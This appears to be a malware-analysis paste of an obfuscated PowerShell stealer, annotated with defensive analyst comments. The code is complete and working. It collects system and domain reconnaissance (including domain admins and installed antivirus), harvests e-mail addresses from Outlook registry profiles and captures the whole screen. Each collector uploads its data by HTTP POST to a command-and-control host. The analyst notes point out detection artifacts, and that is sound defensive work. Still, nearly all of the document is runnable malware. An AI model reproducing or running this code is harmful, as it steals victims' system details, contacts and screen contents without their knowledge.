dissectmalware

Malicious PowerShell

May 1st, 2019
# Exfiltration primitive shared by every collector in this script (analyst note).
# Builds an HTTPS URL from $F36ui — a host variable that is NOT defined anywhere in
# this excerpt, presumably set earlier in the full script — plus a path segment
# produced by [QE7K9ZJvi46.QE7K9ZJvi46]::EA2gkql9ya($Wg94, 0, $true). That type is
# also defined outside this excerpt, so the exact URL shape cannot be confirmed here.
# The payload bytes pass through [QE7K9ZJvi46.QE7K9ZJvi46]::BPizrD (presumably an
# encoding/encryption step — unverifiable from this excerpt) and are then sent with
# WebClient.UploadData, i.e. an HTTP POST with a raw byte body.
# $Wg94 looks like a record-type selector: the callers below pass 0 (host recon),
# 1 (Outlook addresses) and 2 (screenshot).
# Defender view: the observable network artifact is an HTTP POST from
# powershell.exe to an unfamiliar host; all three collectors funnel through here.
function PMQty([int]$Wg94, [byte[]]$V6VCS)
{
    # $F36ui: undefined in this excerpt — the C2 host is supplied elsewhere.
    $sdo7g = "https://$F36ui/" + [QE7K9ZJvi46.QE7K9ZJvi46]::EA2gkql9ya($Wg94, 0, $true)
    $hwv80v = [QE7K9ZJvi46.QE7K9ZJvi46]::BPizrD($V6VCS)
    # The server response (byte[]) is left on the pipeline as this function's output.
    (New-Object System.Net.WebClient).UploadData($sdo7g, $hwv80v)
}
  7.  
# Host/domain reconnaissance collector (analyst note).
# Concatenates the output of several built-in enumeration commands into one
# text blob, UTF-8 encodes it and hands it to PMQty with record type 0.
# Defender view: the burst of child processes spawned from powershell.exe in
# quick succession — systeminfo.exe, ipconfig.exe, netstat.exe, net.exe (x3),
# tasklist.exe, whoami.exe — plus WMI queries against Win32_ComputerSystem and
# root\SecurityCenter2 is the host-side detection opportunity for this stage.
function kvhLZVVHv40()
{
    # Domain membership: WMI PartOfDomain flag OR the USERDNSDOMAIN env var being empty.
    if ((((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN))
    {
        $HmHCMAj1gp = "DOMAIN: NO`n`n"
    } else { $HmHCMAj1gp = "DOMAIN: YES`n`n"}
    # Each external command's output array is joined with newlines under a section header.
    $HmHCMAj1gp += "SYSTEMINFO:`n`n" + ((systeminfo) -join "`n")
    $HmHCMAj1gp += "`n`nIPCONFIG:`n`n" + ((ipconfig /all) -join "`n")
    $HmHCMAj1gp += "`n`nNETSTAT:`n`n" + ((netstat -f) -join "`n")
    $HmHCMAj1gp += "`n`nNETVIEW:`n`n" + ((net view) -join "`n")
    $HmHCMAj1gp += "`n`nTASKLIST:`n`n" + ((tasklist) -join "`n")
    $HmHCMAj1gp += "`n`nWHOAMI:`n`n" + ((whoami) -join "`n")
    # The next two query the domain controller (/domain) — visible as net.exe traffic to a DC.
    $HmHCMAj1gp += "`n`nUSERNAME:`n`n" + ((net user $env:username /domain) -join "`n")
    $HmHCMAj1gp += "`n`nDOMAIN ADMINS:`n`n" + ((net group "domain admins" /domain ) -join "`n")
    # Directory listing of the current user's Desktop folder.
    $HmHCMAj1gp += "`n`nDESKTOP:`n`n" + (Get-ChildItem ([environment]::getfolderpath("desktop")) | Out-String)
    # Installed AV product names via the Security Center WMI namespace.
    $HmHCMAj1gp += "`n`nAV:`n`n" + (Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct").displayName
    $V6VCS = [System.Text.Encoding]::UTF8.GetBytes($HmHCMAj1gp)
    # Record type 0 = host recon.
    PMQty 0 $V6VCS
}
  27.  
# Registry e-mail address harvester (analyst note).
# Reads every value under the wildcard registry path $path, looks for items
# carrying an 'Account Name' or 'Email' property, decodes REG_BINARY values as
# UTF-16LE text, and returns one "email: <value>\n" line per hit as a single string.
# Every failure is swallowed by empty catch blocks, so a missing key or an
# unreadable value produces no error and simply yields an empty string.
# Defender view: registry reads under HKCU Outlook profile keys by powershell.exe
# are the observable; the caller (vC6z) supplies the concrete paths.
function Ux4jkLz([string] $path)
{
    $HmHCMAj1gp = ""
    try {
        # -match on the item object stringifies it; this appears intended to keep
        # only items that expose an 'Account Name' property (TODO confirm behaviour).
        $QQYrQ = (Get-ItemProperty $path | Where {$_ -match 'Account Name'})
        foreach ($m in $QQYrQ) {
            try {
                # Binary values are UTF-16LE strings; plain REG_SZ values are used as-is.
                if ($m."Account Name".GetType().IsArray) {
                    $ml = [System.Text.Encoding]::Unicode.GetString($m."Account Name")
                } else {$ml = $m."Account Name"}
                # Only account names that look like e-mail addresses are kept.
                if ($ml -match "@") {
                    $HmHCMAj1gp += "email: " + $ml + "`n"
                }
            } catch {}   # best-effort: silently skip unreadable values
        }
        # Second pass: the dedicated 'Email' property, kept without the "@" filter.
        $QQYrQ = (Get-ItemProperty $path | Where {$_ -match 'Email'})
        foreach ($m in $QQYrQ) {
            try {
                if ($m.Email.GetType().IsArray) {
                    $ml = [System.Text.Encoding]::Unicode.GetString($m.Email)
                } else {$ml = $m.Email}
                $HmHCMAj1gp += "email: " + $ml + "`n"
            } catch {}   # best-effort: silently skip unreadable values
        }        
    } catch {}   # path absent or inaccessible -> returns ""
    # Return value: the accumulated text (possibly empty).
    $HmHCMAj1gp
}
  55.  
# Outlook profile e-mail collector (analyst note).
# Runs Ux4jkLz over three HKCU profile locations — Office 16.0 and 15.0 Outlook
# profiles and the legacy "Windows Messaging Subsystem" profile store — all under
# the 9375CFF0413111d3B88A00104B2A6676 account-store subkey seen in the paths
# below. Only if at least one address was found is the result UTF-8 encoded and
# sent via PMQty with record type 1; otherwise nothing is transmitted.
function vC6z()
{
    $HmHCMAj1gp = ""
    $HmHCMAj1gp += Ux4jkLz "hkcu:\Software\Microsoft\Office\16.0\Outlook\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*"
    $HmHCMAj1gp += Ux4jkLz "hkcu:\Software\Microsoft\Office\15.0\Outlook\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*"
    $HmHCMAj1gp += Ux4jkLz "hkcu:\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\*"
    # Skip the upload entirely when no address was harvested.
    if ($HmHCMAj1gp -ne "")
    {
        $V6VCS = [System.Text.Encoding]::UTF8.GetBytes($HmHCMAj1gp)
        # Record type 1 = harvested e-mail addresses.
        PMQty 1 $V6VCS
    }
}
  68.  
# Screen capture collector (analyst note).
# Captures the full virtual screen (all monitors) into a Bitmap, encodes it as a
# JPEG at quality 40 into a MemoryStream, Base64-encodes the bytes, and sends the
# ASCII form via PMQty with record type 2.
# Defender view: powershell.exe loading System.Windows.Forms / System.Drawing and
# calling CopyFromScreen is the host-side indicator for this stage.
# Note: the Graphics and Bitmap objects are disposed, the MemoryStream is not.
function cY0yMOo7U3()
{
    Add-Type -Assembly System.Windows.Forms
    # VirtualScreen spans every attached display, not just the primary one.
    $Ze8Fpb5KC = [Windows.Forms.SystemInformation]::VirtualScreen
    $Rpmv5HB = New-Object Drawing.Bitmap $Ze8Fpb5KC.Width, $Ze8Fpb5KC.Height
    $ntkkayAduow = [Drawing.Graphics]::FromImage($Rpmv5HB)
    $ntkkayAduow.CopyFromScreen($Ze8Fpb5KC.Location, [Drawing.Point]::Empty, $Ze8Fpb5KC.Size)
    $ntkkayAduow.Dispose()
    $UkzcuaUqgj = New-Object System.IO.MemoryStream
    # JPEG quality 0-100; 40 trades fidelity for a smaller upload.
    $noFMcdA6cKj=40
    $hwv80voderParams = New-Object System.Drawing.Imaging.EncoderParameters
    $hwv80voderParams.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, $noFMcdA6cKj)
    # Select the JPEG codec by its format description.
    $OmDwFp = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where-Object { $_.FormatDescription -eq "JPEG" }
    $Rpmv5HB.save($UkzcuaUqgj, $OmDwFp, $hwv80voderParams)
    $Rpmv5HB.Dispose()
    # Base64 text, then its ASCII bytes — so the upload body is printable text.
    $V6VCS = [convert]::ToBase64String($UkzcuaUqgj.ToArray())
    $V6VCS = [System.Text.Encoding]::ASCII.GetBytes($V6VCS)
    # Record type 2 = screenshot.
    PMQty 2 $V6VCS
}
  88.  
# Entry point: runs the three collectors in order — host recon (type 0),
# Outlook e-mail addresses (type 1), screenshot (type 2) — each of which uploads
# through PMQty. No persistence or scheduling is visible in this excerpt.
kvhLZVVHv40
vC6z
cY0yMOo7U3